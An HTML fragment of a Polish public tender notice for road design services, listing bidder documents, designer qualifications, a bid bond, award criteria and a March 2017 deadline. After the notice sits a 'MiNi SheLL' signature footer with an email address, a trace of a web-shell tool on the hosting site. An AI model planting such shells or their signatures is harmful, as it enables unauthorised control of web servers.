g)UWAGA: Zgodnie z art. 22 a ustawy Pzp, Wykonawca w celu spełnienia warunków udziału w postępowaniu może polegać na zasobach innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. Jeżeli wykonawca wskazując na spełnienie warunków, o których mowa powyżej, polega na zasobach innych podmiotów zamawiający w celu oceny, czy wykonawca będzie dysponował wskazanymi zasobami w stopniu niezbędnym na potrzeby realizacji zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda złożenia oświadczenia (Załącznik nr 3) zawierającego w szczególności:
 zakresu dostępnych wykonawcy zasobów innego podmiotu,
 sposobu wykorzystania zasobów innego podmiotu przez wykonawcę przy wykonywaniu zamówienia publicznego,
 zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia,
 czy podmiot, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje zakres, których wskazane zdolności dotyczą.
4) Na wezwanie w celu potwierdzenia wiarygodności finansowej i ekonomicznej należy załączyć dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjna co najmniej 100 000,00 zł.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">Na wezwanie w celu potwierdzenia, że oferowane usługi odpowiadają wymaganiom Zamawiającego (załącznik nr 6):
a)Oświadczenie, że zastosowane przez Wykonawcę przy opracowaniu projektu zostaną wskazane materiały które będą posiadały właściwości użytkowe wymagane przy realizacji takich obiektów, a także będą posiadały ważne atesty, aprobaty techniczne i deklaracje zgodności dopuszczające do stosowania na terenie Polski, które na każde żądanie Zamawiającego zostaną niezwłocznie dostarczone.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagane oświadczenie musi być złożone przez każdego wykonawcę w zakresie w jakim jego dotyczy.
b)Oświadczenie o zapoznaniu się z terenem, zaakceptowaniu warunków przetargu oraz warunki do rozliczeń prac przewidzianych na etapie niniejszego postępowania na zasadach określonych w istotnych postanowieniach do umowy, nie objętych niniejszym zamówieniem jeżeli wystąpią i będą zaakceptowane przez Zamawiającego.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagane oświadczenie musi  być złożone przez każdego wykonawcę w zakresie w jakim jego dotyczy.
</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">DOKUMENTY SKŁADANE WRAZ Z OFERTĄ:
Wypełniony druk oferty załącznik nr 1.
Cena zawarta w ofercie musi uwzględniać wszystkie prace wynikające z dokumentacji  i z zalecanej wizji w terenie.
Podpisane oświadczenie, w załączeniu druk o spełnieniu warunków wymaganych w niniejszym postępowaniu i braku podstaw do wykluczenia z postępowania (Załącznik nr 2)UWAGA: Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku podstaw wykluczenia oraz spełnienia, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu zamieszcza informację o tych podmiotach w oświadczeniu (Załącznik nr 2).
 Wraz z ofertą podpisany wykaz personelu wraz z wymaganymi informacjami i dokumentami. W wykazie wykonawca zobowiązany jest do podania: stanowiska, imienia i nazwiska, numeru uprawnień i wykształcenia - niezbędnych do wykonywania zamówienia, doświadczenia wraz z dokumentami potwierdzającymi doświadczenie oraz podstawę dysponowania. Wzór wykazu stanowi załącznik do specyfikacji istotnych warunków zamówienia. Zamawiający wymaga dysponowaniem personelem:
a)Projektantem w specjalności inżynieryjnej drogowej bez ograniczeń lub odpowiadającej im uprawnienia w specjalności konstrukcyjno-budowlanej bez ograniczeń wydane przed 11.07.2013 r., który posiada doświadczenie w wykonaniu (jako projektant w branży inżynieryjnej drogowej lub konstrukcyjno-budowlanej wydane przed 11.07.2003 r.) minimum trzech dokumentacji projektowych rozbudowy, budowy, przebudowy lub remontu dróg, ulic, chodników o długości min. 500 m oraz doświadczenie projektanta w ramach uzyskania decyzji w procedurze ZRID. 
Doświadczenie projektanta branży drogowej stanowi kryterium oceny ofert. 
Zamawiający nie stawia warunku określającego w jakim okresie projektant wykonał/ wykonywał dokumentacje projektowe.
W zakresie posiadanego doświadczenia projektanta branży drogowej, Zamawiający określa warunki dotyczące kryterium oceny ofert zgodnie z punktem 13 niniejszej SIWZ.
b)Projektantem w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń z minimum pięcioletnim doświadczeniem.
c)Projektantem w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wodociągowych i kanalizacyjnych bez ograniczeń z minimum pięcioletnim doświadczeniem.
d)Dowodami, o których mowa powyżej są:
 referencje lub inne dokumenty wystawione przez podmiot, na rzecz którego usługi były   wykonywane,
 inne dokumenty jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie tych dokumentów uzyskać,
 kopie decyzji o pozwoleniu na budowę z klauzulą ostateczności, w treści której w zespole projektowym będzie wskazany projektant, którego doświadczenie wskazuje wykonawca, lub 
 kopia decyzji ZRID z klauzulą ostateczności, w treści której jako inwestor/pełnomocnik inwestora/inwestor zastępczy będzie wskazany projektant, którego doświadczenie będzie podlegało ocenie, 
 referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego osoby te wykonywały wskazane usługi zawierające informacje o wykonaniu dokumentacji projektowej dotyczącej rozbudowy, przebudowy lub budowy drogi odpowiednio w zakresie uzyskania decyzji o pozwoleniu na budowę z klauzulą ostateczności lub uzyskaniu decyzji w procedurze ZRID z klauzulą ostateczności. 
 Treść dokumentów musi potwierdzać że usługi zostały wykonane w sposób należyty.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagane informacje mogą być złożone wspólnie lub oddzielnie przez wykonawców.
UWAGA: Zgodnie z art. 22 a ustawy Pzp, Wykonawca w celu spełnienia warunków udziału w postępowaniu może polegać na zasobach innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. Jeżeli wykonawca wskazując na spełnienie warunków, o których mowa powyżej, polega na zasobach innych podmiotów zamawiający w celu oceny, czy wykonawca będzie dysponował wskazanymi zasobami w stopniu niezbędnym na potrzeby realizacji zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda złożenia oświadczenia (Załącznik nr 3) zawierającego w szczególności:
 zakresu dostępnych wykonawcy zasobów innego podmiotu,
 sposobu wykorzystania zasobów innego podmiotu przez wykonawcę przy wykonywaniu zamówienia publicznego,
 zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia,
 czy podmiot, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje zakres, których wskazane zdolności dotyczą.
Do oferty należy dołączyć informację wykonawcy o podstawie do dysponowania osobą/osobami i zobowiązanie osoby/osób z uprawnieniami, że będą uczestniczyć w wykonywaniu zamówienia.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagane informacje mogą być złożone wspólnie lub oddzielnie przez wykonawców.
Wraz z ofertą jeżeli dotyczy zobowiązanie podmiotu trzeciego do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres realizacji zadania (Załącznik nr 3).
Pełnomocnictwo dla podmiotów występujących wspólnie (konsorcjum, spółka cywilna), jeżeli zaistnieje taka sytuacja, zgodnie z art. 23 ustawy Pzp. W razie wyboru oferty podmiotów występujących wspólnie, Zamawiający zażąda przed zawarciem umowy  stosownie do art. 23 ust. 4 - umowy regulującej współpracę tych podmiotów. 
Oferta wykonawców wspólne ubiegających się o zamówienie (konsorcjum) musi spełniać następujące wymagania: 
 podpisana w taki sposób, by zobowiązywała prawnie wszystkie strony - to znaczy podpisana przez przedstawiciela konsorcjum, którego upoważnienie do złożenia oferty wynika z dołączonego pełnomocnictwa, udzielonego przez upoważnionych przedstawicieli członków konsorcjum. 
 oświadczenia o spełnieniu warunków wymaganych w niniejszym postępowaniu i braku podstaw do wykluczenia z postępowania składa każdy z wykonawców wspólnie ubiegających się o zamówienie.
 Dokumenty potwierdzające spełnianie warunków udziału w postępowaniu składa każdy wykonawca w zakresie w jakim go dotyczą.
Pełnomocnictwo dla osoby podpisującej ofertę i inne dokumenty w imieniu wykonawcy, jeżeli jest to osoba nie wykazana w rejestrze.
Pełnomocnictwo dla osoby podpisującej ofertę w imieniu wykonawcy, jeżeli wykonawca występuje jako spółka cywilna a oferta nie jest podpisywana przez członków spółki cywilnej.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />5 000,00 zł</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>doświadczenie projektanta ranży drogowej</td><td>20</td></tr><tr><td>doświadczenie projektanta branzy drogowej decyzjeZRID</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />zgodnie z warunkami zawartymi ww wzorze umowy<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 21/03/2017, godzina: 10:45,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com